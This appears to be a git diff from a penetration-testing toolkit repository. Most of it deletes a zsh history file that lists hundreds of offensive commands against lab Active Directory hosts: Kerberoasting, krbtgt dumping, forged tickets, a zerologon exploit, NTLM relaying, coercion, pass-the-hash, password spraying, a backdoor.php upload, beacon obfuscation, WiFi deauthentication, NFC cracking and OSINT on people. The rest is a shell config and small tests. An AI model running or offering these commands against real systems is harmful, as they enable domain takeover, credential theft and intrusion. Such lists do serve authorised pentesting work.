-GetUserSPNs.py -outputfile Kerberoastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip 192.168.56.101 BREAKING.BAD/Administrator -hashcat --status --hash-type 13100 --attack-mode 0 Kerberoastables.txt `fzf-wordlists` -john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt -polenum -u anonymous -p anonymous -d DC01.BREAKING.BAD -cme smb 192.168.56.101 -u '' -p '' --pass-pol -addcomputer.py -computer-name 'SHUTDOWN$' -computer-pass '123soleil!' -dc-host DC01 -domain-netbios BREAKING.BAD 'BREAKING.BAD/anonymous:anonymous' -smbexec.py -share 'ADMIN$' -k SV01.BREAKING.BAD -wmiexec.py -k SV01.BREAKING.BAD -getST.py -spn CIFS/SV01@BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 'BREAKING.BAD/SHUTDOWN$:123soleil' -getST.py -spn RPCSS/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 'BREAKING.BAD/SHUTDOWN$:123soleil' -secretsdump -just-dc-user krbtgt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 'BREAKING.BAD/Administrator@dc01.breaking.bad' -lookupsid.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 'BREAKING.BAD/Administrator@dc01.breaking.bad' 0 -ticketer.py -nthash 0123456789krbtgtnthash0123456789 -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain BREAKING.BAD randomuser -ticketer.py -nthash 01234567890sv01nthash01234567890 -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain BREAKING.BAD -spn HOST/SV01.BREAKING.BAD randomuser -export KRB5CCNAME=randomuser.ccache -secretsdump -k SV01.BREAKING.BAD -hashcat --status --hash-type 1000 --attack-mode 0 --username BREAKING.BAD.ntds `fzf-wordlists` -hashcat --hash-type 1000 --potfile-path BREAKING.BAD.ntds.cracked BREAKING.BAD.ntds --show --username -cme ldap 192.168.56.101 -d BREAKING.BAD -u anonymous -p anonymous --asreproast ASREProastables.txt --kdcHost 192.168.56.101 -cme ldap 192.168.56.101 -d BREAKING.BAD -u anonymous -p anonymous --kerberoasting Kerberoastables.txt --kdcHost 192.168.56.101 -ldapsearch -x -h 192.168.56.101 -D '' -w '' -b "dc=BREAKING,dc=BAD" -addspn.py -u 'BREAKING\SV01$' -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/SHUTDOWN.BREAKING.BAD --additional DC01.BREAKING.BAD -dnstool.py -u 'BREAKING\SV01$' -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action add DC01.BREAKING.BAD -krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab -addspn.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -t SV01 -s HTTP/SHUTDOWN.BREAKING.BAD --additional DC01.BREAKING.BAD -dnstool.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action add DC01.BREAKING.BAD -dnstool.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action query DC01.BREAKING.BAD -privexchange.py -u serviceaccount -p P4ssw0rd -ah SHUTDOWN.BREAKING.BAD EXCHANGE.BREAKING.BAD -d BREAKING.BAD -krbrelayx.py --krbpass P4ssw0rd --krbsalt BREAKING.BADSV01 -t ldap://dc01.breaking.bad --escalate-user serviceaccount -wfuzz -c --hw 157 -L -w `fzf-wordlists` -w `fzf-wordlists` -X POST -d 'username=FUZZ&password=FUZ2Z' -u http://192.168.10.10/admin -wfuzz --hc 401 -c -v -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --basic FUZZ:FUZ2Z -u http://192.168.10.10/secretpage -pypykatz lsa minidump lsass.dmp -enyx 1 public 192.168.10.10 -wfuzz --hc 403,404 -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u http://192.168.10.10/FUZZFUZ2Z -fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt file.zip -ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u http://192.168.10.10/ -ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u http://192.168.10.10/ -ffuf -c -w `fzf-wordlists` -e .php,.txt,.pl,.sh,.asp,.aspx,.html,.json,.py,.cfm,.rb,.cgi,.bak,.tar.gz,.tgz,.zip -u http://192.168.10.10/FUZZ -ffuf -c -w `fzf-wordlists` -u http://192.168.10.10/FUZZ --extract-links -ffuf -c -w `fzf-wordlists` -u http://192.168.10.10/FUZZ -wfuzz --hh 185 -c -w `fzf-wordlists` -H "Host: FUZZ.machine.org" -u http://192.168.10.10/ -wfuzz --hh 185 -c -w `fzf-wordlists` -H "Host: FUZZ.org" -u http://192.168.10.10/ -evil-winrm -u serviceaccount -p P4ssw0rd -i 192.168.56.101 -evil-winrm -u serviceaccount -H c1c635aa12ae60b7fe39e28456a7bac6 -i 192.168.56.101 -cme smb 192.168.56.101 --continue-on-success -u users.txt -p passwords.txt -cme smb 192.168.56.101 --continue-on-success --no-bruteforce -u users.txt -p passwords.txt -smbpasswd -U BREAKING/serviceaccount -r 192.168.56.101 -enum4linux-ng -A -u BREAKING/serviceaccount -p 'P@ssword' 192.168.56.101 -enum4linux-ng -A 192.168.59.101 -enum4linux-ng -L 192.168.59.101 -nmap -sS -p 3268,3269 192.168.56.0/24 -nmap -sC -sV -p 139,445,80,21 192.168.56.201 -nmap -Pn -v -sS -F 192.168.56.0/24 -curl http://192.168.10.10/ --upload-file backdoor.php -v -net rpc password 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'P@ssword' -S 'DC01.BREAKING.BAD' -net rpc user add 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'P@ssword' -S 'DC01.BREAKING.BAD' -pth-net rpc password 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'ffffffffffffffffffffffffffffffff':'c1c635aa12ae60b7fe39e28456a7bac6' -S 'DC01.BREAKING.BAD' -zerologon-scan DC01 192.168.56.101 -zerologon-exploit DC01 192.168.56.101 -secretsdump -no-pass 'BREAKING.BAD'/'DC01$'@'dc01.breaking.bad' -secretsdump -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad -zerologon-restore breaking/dc01@dc01 -target-ip 192.168.56.101 -hexpass 69762...6945d -pm3 -p /dev/ttyACM0 -proxmark3 -p /dev/ttyACM0 -nmap --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p 443 mx.example.com -ruler -k -d example.com -u j.doe -p 'Passw0rd!' -e j.doe@example.com --verbose abk dump -o emails.txt -ruler -k -d example.com brute --users owa-valid-users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a spray-results.txt -oaburl.py MEGACORP/j.doe:'Passw0rd!'@mx.example.com -e existent.email@example.com -cypheroth -u neo4j -p exegol4thewin -d BREAKING.BAD -nmap -sS -n --open -p 88 192.168.56.0/24 -windapsearch --dc 192.168.56.101 --module metadata -windapsearch --dc 192.168.56.101 --module users -nmap --script broadcast-dhcp-discover -SimplyEmail -all -e cybersyndicates.com -ssh-keygen -t rsa -b 4096 -f keyname -hashcat --username --hash-type 0 --attack-mode 0 MD5_hashes.txt `fzf-wordlists` -rbcd.py t-delegate-to 'sv01$' -dc-ip dc01 -action read 'BREAKING/anonymous:anonymous' -rbcd.py -delegate-from 'shutdown' -delegate-to 'sv01$' -dc-ip dc01 -action write 'BREAKING/anonymous:anonymous' -rbcd.py -delegate-from 'shutdown' -delegate-to 'sv01$' -dc-ip dc01 -action remove 'BREAKING/anonymous:anonymous' -xfreerdp /d:BREAKING.BAD /u:someuser /pth:c1c635aa12ae60b7fe39e28456a7bac6 /v:SV01.BREAKING.BAD /cert-ignore -darkarmour -f /data/beacon.exe --encrypt xor --jmp --loop 7 -o /data/legit.exe -amber -f beacon.exe -hcxdumptool -I -hcxdumptool -i wlan1 -o dump.pcapng --active_beacon --enable_status=1 -hcxpcapngtool -o dump.hashcat dump.pcapng -hcxhashtool -i dump.hashcat --info stdout -hashcat --hash-type 16800 --attack-mode 0 dump_WPA-PMKID-PBKDF2.hashcat `fzf-wordlists` -hcxpcapngtool --all -o dump.hashcat dump.pcapng -hashcat --hash-type 22000 --attack-mode 0 dump_WPA-PBKDF2-PMKID_EAPOL.hashcat `fzf-wordlists` -responder --interface eth0 --analyze --lm --disable-ess -ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788 -airmon-ng start wlan1 -airodump-ng wlan1 -airodump-ng -c 1 wlan1 -aireplay-ng --deauth 10 -a TR:GT:AP:BS:SS:ID wlan1 -sublist3r -v -d example.com -subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl -holehe test@gmail.com -theHarvester.py -d example.com -g -s -r -f example.com.xml -b all -infoga.py -d example.com -s all -b -r example.com.txt -v 2 -h8mail -t test@gmail.com -phoneinfoga scan -n 33123456789 -maigret user -linkedin2username.py -u myname@email.com -c uber-com -toutatis.py -s SESSIONID -u starbucks -twint -u username --since "2015-12-20 20:30:15" -twint -g="48.880048,2.385939,1km" -o file.csv --csv -ipinfo 1.1.1.1 -onionsearch "computer" -onionsearch "computer" --engines tor66 deeplink phobos --limit 3 -waybackurls test.com -carbon14.py http://menfous.com/ -github-email ghusername -WikiLeaker google.com -tiktok-scraper user USERNAME -d -n 100 -buster -e 'j********9@g****.com' -f john -l doe -b '****1989' -cloudfail.py --target seo.com --tor -assetfinder google.com -subfinder -d freelancer.com -theHarvester -d github.com -b all -nfc-scan-device -v -nfc-list -mfoc -O original.dmp -mfoc -O magic-gen1.dmp -mfdread original.dmp -nfc-mfclassic W A B original.dmp magic-gen1.dmp -libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B -mfoc -O original.dmp -k keys.txt -nrf24-scanner.py -l -v -jackit --reset --debug -secretsdump -ntds ntds.dit.save -system system.save LOCAL -gosecretsdump -ntds ntds.dit.save -system system.save -screen /dev/ttyACM0 115200 -httpmethods --threads 40 --location http://www.s01.breaking.bad/ -hakrawler -url http://www.s01.breaking.bad/ -adidnsdump -u "BREAKING.BAD\someuser" -p 'somepassword' --print-zones 192.168.56.101 -proxychains adidnsdump --dns-tcp -u "BREAKING.BAD\someuser" -p 'somepassword' --print-zones 192.168.56.101 -ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken -feroxbuster -w `fzf-wordlists` -u http://192.168.10.10/ -bloodhound-import -du neo4j -dp exegol4thewin *.json -bloodhound-quickwin -u neo4j -p exegol4thewin -ldapsearch-ad --server 'dc01.breaking.bad' --domain 'breaking.bad' --username 'someuser' --password 'somepassword' --type all -ldapsearch-ad --server 'dc01.breaking.bad' --type info -dnstool.py -u 'BREAKING.BAD\johndoe' -p 'somepassword' --record '*' --action query DC01.BREAKING.BAD -dnstool.py -u 'BREAKING.BAD\johndoe' -p 'somepassword' --record '*' --action add --data 192.168.56.1 DC01.BREAKING.BAD -ntlm-scanner -vuln CVE-2019-1019 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -ntlm-scanner -vuln CVE-2019-1338 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -ntlm-scanner -vuln CVE-2019-1166 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -ntlm-scanner -vuln CVE-2019-1040 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -das add -db dbname masscan '-e eth0 --rate 1000 -iL hosts.txt --open -p1-65535' -das add -db dbname rustscan '-b 1000 -t 2000 -u 5000 -a hosts.txt -r 1-65535 -g --no-config --scan-order "Random"' -das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel -das scan -db dbname -ports 22,80,443,445 -show -das report -hosts 192.168.1.0/24 -oA report2 -hashcat --status --hash-type 2100 --attack-mode 0 '$DCC2$10240#user#bb38628253e7681553b72e7da3adf305' `fzf-wordlists` -pypykatz kerberos tgt "kerberos+rc4://BREAKING.BAD\someuser:bb38628253e7681553b72e7da3adf305@domain.local" -ms14-068.py -u someuser@breaking.bad --rc4 0123456789krbtgtnthash0123456789 -s S-1-5-11-39129514-1145628974-103568174 -d dc01.breaking.bad -getST.py -k -no-pass -spn host/dc01.breaking.bad breaking.bad/someuser -ldapdomaindump --user 'breaking.bad\someuser' --password 'somepassword' --outdir ldapdomaindump dc01.breaking.bad -Get-GPPPassword -debug -no-pass dc01.breaking.bad -Get-GPPPassword BREAKING.BAD/someuser:somepassword@DC01.BREAKING.BAD -cme smb --list-modules -cme ldap dc01.breaking.bad -d breaking.bad -u someuser -p somepassword -M maq -ntlmrelayx -t dcsync://dc02.breaking.bad -smb2support -whatportis 3306 -whatportis postgresql -cmsmap -F -d http://192.168.10.10/ -clusterd -i http://192.168.10.10/ -dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u http://192.168.10.10/ -moodlescan -r -u http://192.168.10.10/ -pywhisker.py -v -d 'domain.local' -u 'user2' -H '126f1f9fdb9a7d9c7ba8d269728b7da0' -t 'sv01$' -a 'add' -o 'sv01' -gettgtpkinit.py -cert-pfx 'sv01.pfx' -pfx-pass 'RLLXdD5FhNPRphSqKGg8' 'domain.local'/'sv01$' 'sv01.ccache' -KRB5CCNAME='sv01.ccache' getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72' 'domain.local'/'sv01$' -petitpotam.py 192.168.56.1 dc01.breaking.bad -petitpotam.py -d breaking.bad -u someaccount -p somepassword 192.168.56.1 dc01.breaking.bad -ntlmrelayx -t ldap://dc02.breaking.bad -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$' -targetedKerberoast.py -v -d domain.local -u user1 -p complexpassword -o Kerberoastables.txt -pass-station search tomcat -nth --text 5f4dcc3b5aa765d61d8327deb882cf99 -pywsus.py --host 192.168.56.1 --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"' -DonPAPI.py breaking.bad/someadmin:somepassword@sometarget -webclientservicescanner -dc-ip dc01.domain.local domain.local/user:password@dc01.domain.local -ntlmrelayx -t http://pki.domain.local/certsrv/certfnsh.asp --adcs -echo '8.8.8.8' | hakrevdns -prips 192.168.0.0 192.168.0.255 -prips -i4 192.168.0.10 192.168.0.250 -prips 173.0.84.0/24 | hakrevdns -nuclei -u https://example.com -ntpdate -u 192.168.56.101 -renameMachine.py -current-name "testcomputer$" -new-name "DC01" -dc-ip dc01 "domain"/"user1":"complexpassword" -getTGT.py -dc-ip dc01 "domain.local"/"DC01":"123pentest" -renameMachine.py -current-name "DC01" -new-name "testcomputer$" -dc-ip dc01 "domain"/"user1":"complexpassword" -KRB5CCNAME="DC01.ccache" getST.py -self -impersonate "domainadmin" -spn "cifs/dc01.domain.local" -k -no-pass -dc-ip dc01 "domain.local"/"dc01" -KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local" -KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local" -pwndb --target @example.com --output txt -robotstester -u http://www.example.com/ -L -shadowcoerce.py -d "domain" -u "user1" -p "complexpassword" 192.168.56.1 192.168.56.101 -faketime '2022-01-31 22:05:35' zsh -manspider --threads 50 192.168.56.0/24 -d BREAKING.BAD -u someuser -H bb38628253e7681553b72e7da3adf305 --content administrateur -dcsync.py -dc "dc01.domain.local" -t "CN=someuser,OU=Users,DC=DOMAIN,DC=LOCAL" 'domain\someuser:somepassword' -gMSADumper.py -d "domain.local" -l "dc01.domain.local" -u "someuser" -p "somepassword" -modifyCertTemplate.py -template KerberosAuthentication -get-acl "domain.local"/"someuser":"somepassword" -smbserver.py -smb2support SHUTDOWN . -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SAM' -o '\\192.168.56.1\SHUTDOWN' -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\SHUTDOWN' -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SECURITY' -o '\\192.168.56.1\SHUTDOWN' -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' backup -o '\\192.168.56.1\SHUTDOWN' -secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL -pyLAPS.py --action get -d 'domain.local' -u 'someuser' -p 'somepassword' --dc-ip 192.168.56.101 -FindUncommonShares.py -d 'domain.local' -u 'someuser' -p 'somepassword' --dc-ip 192.168.56.101 -certipy find -dc-ip 'domaincontroller' -scheme ldap 'domain.local'/'user':'password'@'domaincontroller' -LdapRelayScan.py -method BOTH -dc-ip 192.168.56.101 -u 'someuser' -p 'somepassword' -goldencopy.py --tools all --password exegol4thewin --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 "john" -# -=-=-=-=-=-=-=- YOUR COMMANDS BELOW -=-=-=-=-=-=-=- # diff --git a/sources/zsh/zshrc b/sources/zsh/zshrc deleted file mode 100644 index 519e65ee..00000000 --- a/sources/zsh/zshrc +++ /dev/null @@ -1,34 +0,0 @@ -export ZSH="/root/.oh-my-zsh" -ZSH_THEME="gentoo" - -export FZF_BASE=/opt/tools/fzf - -plugins=(docker docker-compose zsh-syntax-highlighting zsh-completions zsh-autosuggestions tmux fzf zsh-z zsh-nvm) - -source $ZSH/oh-my-zsh.sh - -function prompt_char { - if [ $UID -eq 0 ]; then echo "#"; else echo $; fi -} - -TIME_="%{$fg[white]%}[%{$fg[red]%}%D{%b %d, %Y - %T (%Z)}%{$fg[white]%}]%{$reset_color%}" -PROMPT="$TIME_%{$FX[bold]$FG[013]%} %m %{$fg_bold[blue]%}%(!.%1~.%c) $(prompt_char)%{$reset_color%} " - -export GOPATH=$HOME/go -export GO111MODULE=on -export JOHN=/opt/tools/john/run -export PATH=/opt/tools/bin:$JOHN:$GOPATH/bin:$PATH - -source /opt/.zsh_aliases - -[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh - -# Color correction for zsh-syntax-highlighting -ZSH_AUTOSUGGEST_HIGHLIGHT_STYLE='fg=#626262' - -# In case pipx ensurepath didn't work -export PATH="$PATH:/root/.local/bin" - -export LC_ALL=en_US.UTF-8 -export LANG=en_US.UTF-8 -export LANGUAGE=en_US:en diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 00000000..534cb8a9 --- /dev/null +++ b/tests/__init__.py @@ -0,0 +1,6 @@ +from tests.test_exegol import test_version + +# Run with python3 setup.py test + +# Test version upgrade +test_version() diff --git a/tests/test_exegol.py b/tests/test_exegol.py new file mode 100644 index 00000000..de88d378 --- /dev/null +++ b/tests/test_exegol.py @@ -0,0 +1,5 @@ +from exegol import __version__ + + +def test_version(): + assert __version__ == '4.0.1'